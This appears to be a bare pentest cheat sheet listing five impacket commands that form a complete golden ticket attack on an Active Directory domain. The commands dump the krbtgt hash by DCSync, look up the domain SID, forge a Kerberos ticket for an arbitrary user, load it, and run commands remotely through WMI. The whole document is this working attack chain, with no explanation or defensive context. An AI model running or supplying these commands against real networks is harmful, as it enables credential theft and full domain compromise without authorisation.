impacket-secretsdump -just-dc <domain>/<user>:<password>@<rhost> -just-dc-user krbtgt
impacket-lookupsid <domain>/<user>:<password>@<rhost>
impacket-ticketer -nthash <ntlmHash> -domain-sid <sid> -domain <domain> <attackerUser>
export KRB5CCNAME=<ticketFile>
impacket-wmiexec -k -no-pass <fqdnRhost>